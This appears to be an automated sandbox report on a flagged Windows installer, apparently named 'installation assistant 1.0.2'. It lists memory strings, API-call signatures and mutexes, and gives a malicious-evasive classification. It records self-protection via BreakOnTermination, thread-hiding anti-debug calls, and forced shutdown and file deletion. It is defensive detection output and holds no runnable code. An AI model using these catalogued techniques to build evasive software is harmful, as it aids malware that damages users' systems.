Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.0000000003710000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000000.1685903370.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.1775195665.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.0000000003710000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000000.1685903370.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.1775195665.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: 01 00 00 00 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C0A3886
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C225120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C225120
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C0A3C62
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C0A3D18
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C225D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C225D60
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C0A3D62
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C0A39CF
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C0A3A6A
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A1950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6C0A1950
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6C0A4754
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A47546_2_6C0A4754
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0B4A276_2_6C0B4A27
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2218806_2_6C221880
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C226A436_2_6C226A43
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C286CE06_2_6C286CE0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D3D506_2_6C2D3D50
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C258EA16_2_6C258EA1
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D9E806_2_6C2D9E80
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C272EC96_2_6C272EC9
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CE8106_2_6C2CE810
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2EA9306_2_6C2EA930
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2589726_2_6C258972
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D99F06_2_6C2D99F0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CFA506_2_6C2CFA50
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D1AA06_2_6C2D1AA0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2E4AA06_2_6C2E4AA0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CDAD06_2_6C2CDAD0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C270B666_2_6C270B66
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CAB906_2_6C2CAB90
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C260BCA6_2_6C260BCA
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C27540A6_2_6C27540A
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2DE4D06_2_6C2DE4D0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D25806_2_6C2D2580
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2DF5C06_2_6C2DF5C0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CB6506_2_6C2CB650
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D96E06_2_6C2D96E0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2F97006_2_6C2F9700
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C25C7CF6_2_6C25C7CF
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D00206_2_6C2D0020
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2E37506_2_6C2E3750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006F81EC9_2_006F81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006CE00A9_2_006CE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007381C09_2_007381C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007482409_2_00748240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007322E09_2_007322E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007523009_2_00752300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074C3C09_2_0074C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007404C89_2_007404C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0071E49F9_2_0071E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007325F09_2_007325F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007286509_2_00728650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007266D09_2_007266D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072A6A09_2_0072A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072C9509_2_0072C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007009439_2_00700943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074E9909_2_0074E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00732A809_2_00732A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0070AB119_2_0070AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00728C209_2_00728C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00736CE09_2_00736CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00740E009_2_00740E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00744EA09_2_00744EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007110AC9_2_007110AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0073D0899_2_0073D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0071B1219_2_0071B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007411209_2_00741120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072D1D09_2_0072D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007491C09_2_007491C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007351809_2_00735180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072B1809_2_0072B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007472009_2_00747200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074D2C09_2_0074D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007153F39_2_007153F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006DB3E49_2_006DB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B53CF9_2_006B53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074F3C09_2_0074F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0073F3A09_2_0073F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074D4709_2_0074D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0073F4209_2_0073F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007274109_2_00727410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007454D09_2_007454D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006FD4969_2_006FD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B15729_2_006B1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007415509_2_00741550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007435309_2_00743530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0075351A9_2_0075351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072F5009_2_0072F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074F5999_2_0074F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007096529_2_00709652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007536019_2_00753601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0073D6A09_2_0073D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006C97669_2_006C9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B97CA9_2_006B97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007477C09_2_007477C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006DF8E09_2_006DF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072F9109_2_0072F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074D9E09_2_0074D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00737AF09_2_00737AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00703AEF9_2_00703AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006CBAC99_2_006CBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B1AA19_2_006B1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00737C509_2_00737C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006CBC929_2_006CBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072FDF09_2_0072FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00735E809_2_00735E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00735F809_2_00735F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: String function: 6C259240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: String function: 6C2F6F10 appears 416 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0074FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 006B1E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 006B28E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007EFEA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName8yHCrhGsg5TqPsOc.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.000000000382E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName8yHCrhGsg5TqPsOc.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000000.1682249034.0000000000679000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName8yHCrhGsg5TqPsOc.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeBinary or memory string: OriginalFileName8yHCrhGsg5TqPsOc.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal92.evad.winEXE@134/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C225D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C225D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_006B9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006C3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_006C3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,9_2_006B9252
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C225240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C225240
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\is-5HBF3.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1816:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2708:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2640:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3452:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
